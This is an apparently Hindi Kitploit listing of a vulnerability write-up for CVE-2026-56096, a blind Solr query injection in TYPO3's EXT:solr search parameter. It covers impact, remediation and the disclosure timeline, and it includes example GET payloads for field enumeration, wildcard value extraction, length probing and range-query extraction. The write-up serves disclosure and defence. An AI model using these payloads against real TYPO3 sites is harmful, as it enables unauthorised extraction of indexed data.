Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-56096 — CVE-2026-56096 के लिए प्रूफ ऑफ कॉन्सेप्ट और तकनीकी राइट-अप, जो TYPO3 EXT:solr में एक ब्लाइंड Solr क्वेरी इंजेक्शन है जो अनऑथेंटिकेटेड फील्ड एन्यूमरेशन और डेटा एक्सट्रैक्शन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/yairhinkis/cve-2026-56096
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेपर और शोध
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

CVE-2026-56096 के लिए प्रूफ ऑफ कॉन्सेप्ट और तकनीकी राइट-अप, जो TYPO3 EXT:solr में एक ब्लाइंड Solr क्वेरी इंजेक्शन है जो अनऑथेंटिकेटेड फील्ड एन्यूमरेशन और डेटा एक्सट्रैक्शन को सक्षम बनाता है।

रिपॉजिटरी देखें
9घं 54मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-56096: TYPO3 EXT:solr में Solr क्वेरी इंजेक्शन और ब्लाइंड डेटा एक्सट्रैक्शन

आधिकारिक TYPO3 Apache Solr एक्सटेंशन (EXT:solr / apache-solr-for-typo3/solr) में एक आर्किटेक्चरल सुरक्षा भेद्यता की खोज की गई थी। यह समस्या अनधिकृत रिमोट हमलावरों को सर्च पैरामीटर tx_solr[q] के माध्यम से मनमाना Solr/Lucene क्वेरी सिंटैक्स इंजेक्ट करने की अनुमति देती है, जिससे सर्च इंडेक्स से अनधिकृत ब्लाइंड फ़ील्ड एन्यूमरेशन और पूर्ण मेटाडेटा एक्सट्रैक्शन संभव हो जाता है।


मेटाडेटा

  • CVE ID: CVE-2026-56096
  • भेद्यता प्रकार: CWE-943: डेटा क्वेरी लॉजिक में विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन
  • लक्ष्य घटक: EXT:solr (सर्च पैरामीटर: tx_solr[q])
  • CVSS v4.0 स्कोर: 6.3 (मध्यम) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • शोधकर्ता: Yair Hinkis

  • भेद्यता अवलोकन

    EXT:solr एक्सटेंशन tx_solr[q] पैरामीटर के माध्यम से उपयोगकर्ता-प्रदत्त सर्च शब्दों को स्वीकार करता है और उन्हें Apache Solr इंजन को अग्रेषित करता है। डिज़ाइन के अनुसार, एक्सटेंशन विशिष्ट क्वेरी ऑपरेटरों—जैसे वाइल्डकार्ड (*), एकल-वर्ण वाइल्डकार्ड (?), फ़ील्ड सेलेक्टर (:), और रेंज क्वेरी ([a TO z])—को अनुमति देता है ताकि फेसेटेड फ़िल्टरिंग जैसी वैध कार्यक्षमता का समर्थन किया जा सके।

    चूंकि इन वर्णों को बैकएंड क्वेरी निर्माण में सीधे पास किया गया था, बिना किसी प्रवर्तनीय व्हाइटलिस्ट या क्वेरी एब्स्ट्रैक्शन लेयर के, एक हमलावर इच्छित सर्च सीमाओं से बचने के लिए फ़ील्ड-विशिष्ट सिंटैक्स प्रदान कर सकता है। यह अनधिकृत उपयोगकर्ताओं को सीधे आंतरिक Solr फ़ील्ड्स को क्वेरी करने और बूलियन-आधारित ब्लाइंड तकनीकों का उपयोग करके इंडेक्स डेटा निकालने की अनुमति देता है।


    हमला तकनीकें

    1. field:* के माध्यम से फ़ील्ड एन्यूमरेशन

    किसी मनमाने या अनुमानित फ़ील्ड नाम में वाइल्डकार्ड जोड़कर, एक हमलावर यह सत्यापित कर सकता है कि फ़ील्ड स्कीमा में मौजूद है या नहीं:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:* HTTP/1.1
    Host: target.example.com
    
    

    यदि फ़ील्ड मौजूद है, तो Solr सभी मेल खाते रिकॉर्ड्स पर क्वेरी को प्रोसेस करता है (अक्सर अलग रिस्पॉन्स कोड या वॉल्यूम-संबंधित व्यवहार को ट्रिगर करता है), जिससे स्वचालित वर्डलिस्ट-आधारित फ़ील्ड एन्यूमरेशन संभव हो जाता है।


    2. प्रीफ़िक्स वाइल्डकार्ड के माध्यम से ब्लाइंड वैल्यू एक्सट्रैक्शन

    हमलावर बूलियन अनुमान का उपयोग करके संवेदनशील फ़ील्ड मानों को वर्ण-दर-वर्ण निकाल सकते हैं:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Returns search hits (Value begins with 'a')
    GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Value does not begin with 'b')
    
    

    3. ? ऑपरेटर के माध्यम से लंबाई का पता लगाना

    एकल-वर्ण वाइल्डकार्ड ऑपरेटर (?) वर्ण पुनरावृत्ति शुरू करने से पहले संग्रहीत स्ट्रिंग की सटीक लंबाई निर्धारित कर सकता है:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Checks for 12+ characters)
    GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Checks for 13+ characters)
    
    

    4. त्वरित रेंज क्वेरी ([a TO z])

    रेंज क्वेरी प्रारंभिक वर्ण पर बाइनरी-सर्च एक्सट्रैक्शन की अनुमति देती हैं, जिससे प्रति वर्ण स्थिति में आवश्यक अनुरोधों की संख्या 26 से घटकर ~5 हो जाती है:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determines if character falls within 'a'-'m'
    GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determines if character falls within 'n'-'z'
    
    

    लंबाई का पता लगाना, रेंज क्वेरी, और प्रीफ़िक्स वाइल्डकार्ड को संयोजित करने से न्यूनतम अनुरोध फुटप्रिंट के साथ पूर्ण फ़ील्ड एक्सट्रैक्शन संभव हो जाता है।


    प्रभाव

    • गोपनीयता उल्लंघन: Apache Solr में इंडेक्स किए गए सभी फ़ील्ड्स का पूर्ण एक्सट्रैक्शन (जैसे, आंतरिक सिस्टम हैश, छिपी पृष्ठ सामग्री, उपयोगकर्ता-संबंधित मेटाडेटा, और सिस्टम पहचानकर्ता)।
    • एक्सेस कंट्रोल बायपास: फ्रंटएंड सर्च फ़िल्टर और TypoScript डिस्प्ले प्रतिबंधों को बायपास करता है।
    • दायरा: EXT:solr सर्च एंडपॉइंट का उपयोग करने वाली सभी डिफ़ॉल्ट इंस्टॉलेशन प्रभावित थीं।

    उपचार

    वैश्विक वर्ण एस्केपिंग अपर्याप्त है क्योंकि * और : जैसे ऑपरेटर इच्छित सर्च सुविधाओं के लिए काम करते हैं। उपचार के लिए एप्लिकेशन-लेयर व्हाइटलिस्ट और पार्सिंग मॉडल की आवश्यकता होती है:

    1. Solr इंजन को भेजने से पहले उपयोगकर्ता-प्रदत्त क्वेरी स्ट्रिंग्स को एक एब्स्ट्रैक्ट सिंटैक्स ट्री (AST) में पार्स करें।
    2. अनुमेय फ़ील्ड लक्ष्यों पर सख्त allowlists लागू करें, आंतरिक या प्रतिबंधित फ़ील्ड्स के विरुद्ध सीधे उपयोगकर्ता क्वेरी की अनुमति न दें।
    3. अविश्वसनीय इनपुट संदर्भों से उत्पन्न गैर-व्हाइटलिस्टेड ऑपरेटर दुरुपयोग को न्यूट्रलाइज़ करें।

    समन्वित प्रकटीकरण समयरेखा

    • 6 मार्च, 2026: एक अधिकृत मूल्यांकन के दौरान भेद्यता की पहचान; प्रारंभिक विक्रेता अधिसूचना।
    • 17 अप्रैल, 2026: विक्रेता ने स्थानीय एज मिटिगेशन लागू किए; अपस्ट्रीम बग प्रकृति की पुष्टि की।
    • 8 मई, 2026: TYPO3 सुरक्षा टीम ([email protected]) को औपचारिक भेद्यता रिपोर्ट प्रस्तुत की गई।
    • 15 जून, 2026: TYPO3 सुरक्षा टीम ने पुनरुत्पादन की पुष्टि की और एक्सटेंशन मेंटेनर्स के साथ पैच विकास शुरू किया।
    • 25 अगस्त, 2026: आधिकारिक सुरक्षा बुलेटिन जारी किया गया, पैच प्रकाशित किया गया, और CVE-2026-56096 सौंपा गया।

    संदर्भ

    • TYPO3 सुरक्षा सलाह: TYPO3-EXT-SA-2026-025
    • CWE परिभाषा: CWE-943: Improper Neutralization of Special Elements in Data Query Logic
    टूल डाउनलोड करें